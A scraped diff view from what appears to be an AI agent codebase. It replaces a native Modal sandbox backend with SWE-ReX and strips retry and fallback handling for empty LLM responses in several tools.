filesystem is snapshotted on cleanup and restored on next creation, so
|
||||
installed packages, project files, and config changes survive across sessions.
|
||||
Supports persistent filesystem snapshots: when enabled, the sandbox's filesystem
|
||||
is snapshotted on cleanup and restored on next creation, so installed packages,
|
||||
project files, and config changes survive across sessions.
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import json
|
||||
import logging
|
||||
import shlex
|
||||
import threading
|
||||
import uuid
|
||||
from pathlib import Path
|
||||
@@ -46,7 +39,7 @@ def _save_snapshots(data: Dict[str, str]) -> None:
|
||||
|
||||
|
||||
class _AsyncWorker:
|
||||
"""Background thread with its own event loop for async-safe Modal calls.
|
||||
"""Background thread with its own event loop for async-safe swe-rex calls.
|
||||
|
||||
Allows sync code to submit async coroutines and block for results,
|
||||
even when called from inside another running event loop (e.g. Atropos).
|
||||
@@ -82,10 +75,9 @@ class _AsyncWorker:
|
||||
|
||||
|
||||
class ModalEnvironment(BaseEnvironment):
|
||||
"""Modal cloud execution via native Modal SDK.
|
||||
"""Modal cloud execution via SWE-ReX.
|
||||
|
||||
Uses Modal's Sandbox.create() for container lifecycle and Sandbox.exec()
|
||||
for command execution — no intermediate HTTP server or tunnel required.
|
||||
Uses swe-rex's ModalDeployment directly for sandbox management.
|
||||
Adds sudo -S support, configurable resources (CPU, memory, disk),
|
||||
and optional filesystem persistence via Modal's snapshot API.
|
||||
"""
|
||||
@@ -104,8 +96,7 @@ class ModalEnvironment(BaseEnvironment):
|
||||
self._persistent = persistent_filesystem
|
||||
self._task_id = task_id
|
||||
self._base_image = image
|
||||
self._sandbox = None
|
||||
self._app = None
|
||||
self._deployment = None
|
||||
self._worker = _AsyncWorker()
|
||||
|
||||
sandbox_kwargs = dict(modal_sandbox_kwargs or {})
|
||||
@@ -137,27 +128,25 @@ class ModalEnvironment(BaseEnvironment):
|
||||
],
|
||||
)
|
||||
|
||||
# Start the async worker thread and create sandbox on it
|
||||
# Start the async worker thread and create the deployment on it
|
||||
# so all gRPC channels are bound to the worker's event loop.
|
||||
self._worker.start()
|
||||
|
||||
async def _create_sandbox():
|
||||
app = await _modal.App.lookup.aio(
|
||||
"hermes-agent", create_if_missing=True
|
||||
)
|
||||
sandbox = await _modal.Sandbox.create.aio(
|
||||
"sleep", "infinity",
|
||||
image=effective_image,
|
||||
app=app,
|
||||
timeout=int(sandbox_kwargs.pop("timeout", 3600)),
|
||||
**sandbox_kwargs,
|
||||
)
|
||||
return app, sandbox
|
||||
from swerex.deployment.modal import ModalDeployment
|
||||
|
||||
self._app, self._sandbox = self._worker.run_coroutine(
|
||||
_create_sandbox(), timeout=300
|
||||
)
|
||||
logger.info("Modal: sandbox created (task=%s)", self._task_id)
|
||||
async def _create_and_start():
|
||||
deployment = ModalDeployment(
|
||||
image=effective_image,
|
||||
startup_timeout=180.0,
|
||||
runtime_timeout=3600.0,
|
||||
deployment_timeout=3600.0,
|
||||
install_pipx=True,
|
||||
modal_sandbox_kwargs=sandbox_kwargs,
|
||||
)
|
||||
await deployment.start()
|
||||
return deployment
|
||||
|
||||
self._deployment = self._worker.run_coroutine(_create_and_start())
|
||||
|
||||
def execute(self, command: str, cwd: str = "", *,
|
||||
timeout: int | None = None,
|
||||
@@ -170,47 +159,42 @@ class ModalEnvironment(BaseEnvironment):
|
||||
|
||||
exec_command, sudo_stdin = self._prepare_command(command)
|
||||
|
||||
# Modal sandboxes execute commands via exec() and cannot pipe
|
||||
# subprocess stdin directly. When a sudo password is present,
|
||||
# use a shell-level pipe from printf.
|
||||
# Modal sandboxes execute commands via the Modal SDK and cannot pipe
|
||||
# subprocess stdin directly the way a local Popen can. When a sudo
|
||||
# password is present, use a shell-level pipe from printf so that the
|
||||
# password feeds sudo -S without appearing as an echo argument embedded
|
||||
# in the shell string.
|
||||
if sudo_stdin is not None:
|
||||
import shlex
|
||||
exec_command = (
|
||||
f"printf '%s\\n' {shlex.quote(sudo_stdin.rstrip())} | {exec_command}"
|
||||
)
|
||||
|
||||
from swerex.runtime.abstract import Command as RexCommand
|
||||
|
||||
effective_cwd = cwd or self.cwd
|
||||
effective_timeout = timeout or self.timeout
|
||||
|
||||
# Wrap command with cd + stderr merge
|
||||
full_command = f"cd {shlex.quote(effective_cwd)} && {exec_command}"
|
||||
|
||||
# Run in a background thread so we can poll for interrupts
|
||||
result_holder = {"value": None, "error": None}
|
||||
|
||||
def _run():
|
||||
try:
|
||||
async def _do_execute():
|
||||
process = await self._sandbox.exec.aio(
|
||||
"bash", "-c", full_command,
|
||||
timeout=effective_timeout,
|
||||
return await self._deployment.runtime.execute(
|
||||
RexCommand(
|
||||
command=exec_command,
|
||||
shell=True,
|
||||
check=False,
|
||||
cwd=effective_cwd,
|
||||
timeout=effective_timeout,
|
||||
merge_output_streams=True,
|
||||
)
|
||||
)
|
||||
# Read stdout; redirect stderr to stdout in the shell
|
||||
# command so we get merged output
|
||||
stdout = await process.stdout.read.aio()
|
||||
stderr = await process.stderr.read.aio()
|
||||
exit_code = await process.wait.aio()
|
||||
# Merge stdout + stderr (stderr after stdout)
|
||||
output = stdout
|
||||
if stderr:
|
||||
output = f"{stdout}\n{stderr}" if stdout else stderr
|
||||
return output, exit_code
|
||||
|
||||
output, exit_code = self._worker.run_coroutine(
|
||||
_do_execute(), timeout=effective_timeout + 30
|
||||
)
|
||||
output = self._worker.run_coroutine(_do_execute())
|
||||
result_holder["value"] = {
|
||||
"output": output,
|
||||
"returncode": exit_code,
|
||||
"output": output.stdout,
|
||||
"returncode": output.exit_code,
|
||||
}
|
||||
except Exception as e:
|
||||
result_holder["error"] = e
|
||||
@@ -222,7 +206,7 @@ class ModalEnvironment(BaseEnvironment):
|
||||
if is_interrupted():
|
||||
try:
|
||||
self._worker.run_coroutine(
|
||||
self._sandbox.terminate.aio(),
|
||||
asyncio.wait_for(self._deployment.stop(), timeout=10),
|
||||
timeout=15,
|
||||
)
|
||||
except Exception:
|
||||
@@ -238,37 +222,38 @@ class ModalEnvironment(BaseEnvironment):
|
||||
|
||||
def cleanup(self):
|
||||
"""Snapshot the filesystem (if persistent) then stop the sandbox."""
|
||||
if self._sandbox is None:
|
||||
if self._deployment is None:
|
||||
return
|
||||
|
||||
if self._persistent:
|
||||
try:
|
||||
async def _snapshot():
|
||||
img = await self._sandbox.snapshot_filesystem.aio()
|
||||
return img.object_id
|
||||
sandbox = getattr(self._deployment, '_sandbox', None)
|
||||
if sandbox:
|
||||
async def _snapshot():
|
||||
img = await sandbox.snapshot_filesystem.aio()
|
||||
return img.object_id
|
||||
|
||||
try:
|
||||
snapshot_id = self._worker.run_coroutine(_snapshot(), timeout=60)
|
||||
except Exception:
|
||||
snapshot_id = None
|
||||
try:
|
||||
snapshot_id = self._worker.run_coroutine(_snapshot(), timeout=60)
|
||||
except Exception:
|
||||
snapshot_id = None
|
||||
|
||||
if snapshot_id:
|
||||
snapshots = _load_snapshots()
|
||||
snapshots[self._task_id] = snapshot_id
|
||||
_save_snapshots(snapshots)
|
||||
logger.info("Modal: saved filesystem snapshot %s for task %s",
|
||||
snapshot_id[:20], self._task_id)
|
||||
if snapshot_id:
|
||||
snapshots = _load_snapshots()
|
||||
snapshots[self._task_id] = snapshot_id
|
||||
_save_snapshots(snapshots)
|
||||
logger.info("Modal: saved filesystem snapshot %s for task %s",
|
||||
snapshot_id[:20], self._task_id)
|
||||
except Exception as e:
|
||||
logger.warning("Modal: filesystem snapshot failed: %s", e)
|
||||
|
||||
try:
|
||||
self._worker.run_coroutine(
|
||||
self._sandbox.terminate.aio(),
|
||||
asyncio.wait_for(self._deployment.stop(), timeout=10),
|
||||
timeout=15,
|
||||
)
|
||||
except Exception:
|
||||
pass
|
||||
finally:
|
||||
self._worker.stop()
|
||||
self._sandbox = None
|
||||
self._app = None
|
||||
self._deployment = None
|
||||
|
||||
+1
-1
@@ -797,7 +797,7 @@ class MCPServerTask:
|
||||
"""
|
||||
self._config = config
|
||||
self.tool_timeout = config.get("timeout", _DEFAULT_TOOL_TIMEOUT)
|
||||
self._auth_type = (config.get("auth") or "").lower().strip()
|
||||
self._auth_type = config.get("auth", "").lower().strip()
|
||||
|
||||
# Set up sampling handler if enabled and SDK types are available
|
||||
sampling_config = config.get("sampling", {})
|
||||
|
||||
@@ -52,7 +52,6 @@ import asyncio
|
||||
import datetime
|
||||
from typing import Dict, Any, List, Optional
|
||||
from tools.openrouter_client import get_async_client as _get_openrouter_client, check_api_key as check_openrouter_api_key
|
||||
from agent.auxiliary_client import extract_content_or_reasoning
|
||||
from tools.debug_helpers import DebugSession
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
@@ -144,13 +143,7 @@ async def _run_reference_model_safe(
|
||||
|
||||
response = await _get_openrouter_client().chat.completions.create(**api_params)
|
||||
|
||||
content = extract_content_or_reasoning(response)
|
||||
if not content:
|
||||
# Reasoning-only response — let the retry loop handle it
|
||||
logger.warning("%s returned empty content (attempt %s/%s), retrying", model, attempt + 1, max_retries)
|
||||
if attempt < max_retries - 1:
|
||||
await asyncio.sleep(min(2 ** (attempt + 1), 60))
|
||||
continue
|
||||
content = response.choices[0].message.content.strip()
|
||||
logger.info("%s responded (%s characters)", model, len(content))
|
||||
return model, content, True
|
||||
|
||||
@@ -218,14 +211,7 @@ async def _run_aggregator_model(
|
||||
|
||||
response = await _get_openrouter_client().chat.completions.create(**api_params)
|
||||
|
||||
content = extract_content_or_reasoning(response)
|
||||
|
||||
# Retry once on empty content (reasoning-only response)
|
||||
if not content:
|
||||
logger.warning("Aggregator returned empty content, retrying once")
|
||||
response = await _get_openrouter_client().chat.completions.create(**api_params)
|
||||
content = extract_content_or_reasoning(response)
|
||||
|
||||
content = response.choices[0].message.content.strip()
|
||||
logger.info("Aggregation complete (%s characters)", len(content))
|
||||
return content
|
||||
|
||||
|
||||
@@ -419,23 +419,6 @@ def _apply_update(op: PatchOperation, file_ops: Any) -> Tuple[bool, str]:
|
||||
|
||||
if error:
|
||||
return False, f"Could not apply hunk: {error}"
|
||||
else:
|
||||
# Addition-only hunk (no context or removed lines).
|
||||
# Insert at the location indicated by the context hint, or at end of file.
|
||||
insert_text = '\n'.join(replace_lines)
|
||||
if hunk.context_hint:
|
||||
hint_pos = new_content.find(hunk.context_hint)
|
||||
if hint_pos != -1:
|
||||
# Insert after the line containing the context hint
|
||||
eol = new_content.find('\n', hint_pos)
|
||||
if eol != -1:
|
||||
new_content = new_content[:eol + 1] + insert_text + '\n' + new_content[eol + 1:]
|
||||
else:
|
||||
new_content = new_content + '\n' + insert_text
|
||||
else:
|
||||
new_content = new_content.rstrip('\n') + '\n' + insert_text + '\n'
|
||||
else:
|
||||
new_content = new_content.rstrip('\n') + '\n' + insert_text + '\n'
|
||||
|
||||
# Write new content
|
||||
write_result = file_ops.write_file(op.file_path, new_content)
|
||||
|
||||
+6
-9
@@ -98,22 +98,19 @@ class ToolRegistry:
|
||||
are included.
|
||||
"""
|
||||
result = []
|
||||
check_results: Dict[Callable, bool] = {}
|
||||
for name in sorted(tool_names):
|
||||
entry = self._tools.get(name)
|
||||
if not entry:
|
||||
continue
|
||||
if entry.check_fn:
|
||||
if entry.check_fn not in check_results:
|
||||
try:
|
||||
check_results[entry.check_fn] = bool(entry.check_fn())
|
||||
except Exception:
|
||||
check_results[entry.check_fn] = False
|
||||
try:
|
||||
if not entry.check_fn():
|
||||
if not quiet:
|
||||
logger.debug("Tool %s check raised; skipping", name)
|
||||
if not check_results[entry.check_fn]:
|
||||
logger.debug("Tool %s unavailable (check failed)", name)
|
||||
continue
|
||||
except Exception:
|
||||
if not quiet:
|
||||
logger.debug("Tool %s unavailable (check failed)", name)
|
||||
logger.debug("Tool %s check raised; skipping", name)
|
||||
continue
|
||||
result.append({"type": "function", "function": entry.schema})
|
||||
return result
|
||||
|
||||
@@ -21,7 +21,7 @@ import json
|
||||
import logging
|
||||
from typing import Dict, Any, List, Optional, Union
|
||||
|
||||
from agent.auxiliary_client import async_call_llm, extract_content_or_reasoning
|
||||
from agent.auxiliary_client import async_call_llm
|
||||
MAX_SESSION_CHARS = 100_000
|
||||
MAX_SUMMARY_TOKENS = 10000
|
||||
|
||||
@@ -161,15 +161,7 @@ async def _summarize_session(
|
||||
temperature=0.1,
|
||||
max_tokens=MAX_SUMMARY_TOKENS,
|
||||
)
|
||||
content = extract_content_or_reasoning(response)
|
||||
if content:
|
||||
return content
|
||||
# Reasoning-only / empty — let the retry loop handle it
|
||||
logging.warning("Session search LLM returned empty content (attempt %d/%d)", attempt + 1, max_retries)
|
||||
if attempt < max_retries - 1:
|
||||
await asyncio.sleep(1 * (attempt + 1))
|
||||
continue
|
||||
return content
|
||||
return response.choices[0].message.content.strip()
|
||||
except RuntimeError:
|
||||
logging.warning("No auxiliary model available for session summarization")
|
||||
return None
|
||||
@@ -392,30 +384,23 @@ def session_search(
|
||||
}, ensure_ascii=False)
|
||||
|
||||
summaries = []
|
||||
for (session_id, match_info, conversation_text, _), result in zip(tasks, results):
|
||||
for (session_id, match_info, _, _), result in zip(tasks, results):
|
||||
if isinstance(result, Exception):
|
||||
logging.warning(
|
||||
"Failed to summarize session %s: %s",
|
||||
session_id, result, exc_info=True,
|
||||
session_id,
|
||||
result,
|
||||
exc_info=True,
|
||||
)
|
||||
result = None
|
||||
|
||||
entry = {
|
||||
"session_id": session_id,
|
||||
"when": _format_timestamp(match_info.get("session_started")),
|
||||
"source": match_info.get("source", "unknown"),
|
||||
"model": match_info.get("model"),
|
||||
}
|
||||
|
||||
continue
|
||||
if result:
|
||||
entry["summary"] = result
|
||||
else:
|
||||
# Fallback: raw preview so matched sessions aren't silently
|
||||
# dropped when the summarizer is unavailable (fixes #3409).
|
||||
preview = (conversation_text[:500] + "\n…[truncated]") if conversation_text else "No preview available."
|
||||
entry["summary"] = f"[Raw preview — summarization unavailable]\n{preview}"
|
||||
|
||||
summaries.append(entry)
|
||||
summaries.append({
|
||||
"session_id": session_id,
|
||||
"when": _format_timestamp(match_info.get("session_started")),
|
||||
"source": match_info.get("source", "unknown"),
|
||||
"model": match_info.get("model"),
|
||||
"summary": result,
|
||||
})
|
||||
|
||||
return json.dumps({
|
||||
"success": True,
|
||||
|
||||
@@ -547,13 +547,6 @@ def skill_manage(
|
||||
else:
|
||||
result = {"success": False, "error": f"Unknown action '{action}'. Use: create, edit, patch, delete, write_file, remove_file"}
|
||||
|
||||
if result.get("success"):
|
||||
try:
|
||||
from agent.prompt_builder import clear_skills_system_prompt_cache
|
||||
clear_skills_system_prompt_cache(clear_snapshot=True)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
return json.dumps(result, ensure_ascii=False)
|
||||
|
||||
|
||||
|
||||
@@ -948,9 +948,9 @@ def llm_audit_skill(skill_path: Path, static_result: ScanResult,
|
||||
|
||||
# Call the LLM via the centralized provider router
|
||||
try:
|
||||
from agent.auxiliary_client import call_llm, extract_content_or_reasoning
|
||||
from agent.auxiliary_client import call_llm
|
||||
|
||||
call_kwargs = dict(
|
||||
response = call_llm(
|
||||
provider="openrouter",
|
||||
model=model,
|
||||
messages=[{
|
||||
@@ -960,13 +960,7 @@ def llm_audit_skill(skill_path: Path, static_result: ScanResult,
|
||||
temperature=0,
|
||||
max_tokens=1000,
|
||||
)
|
||||
response = call_llm(**call_kwargs)
|
||||
llm_text = extract_content_or_reasoning(response)
|
||||
|
||||
# Retry once on empty content (reasoning-only response)
|
||||
if not llm_text:
|
||||
response = call_llm(**call_kwargs)
|
||||
llm_text = extract_content_or_reasoning(response)
|
||||
llm_text = response.choices[0].message.content.strip()
|
||||
except Exception:
|
||||
# LLM audit is best-effort — don't block install if the call fails
|
||||
return static_result
|
||||
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user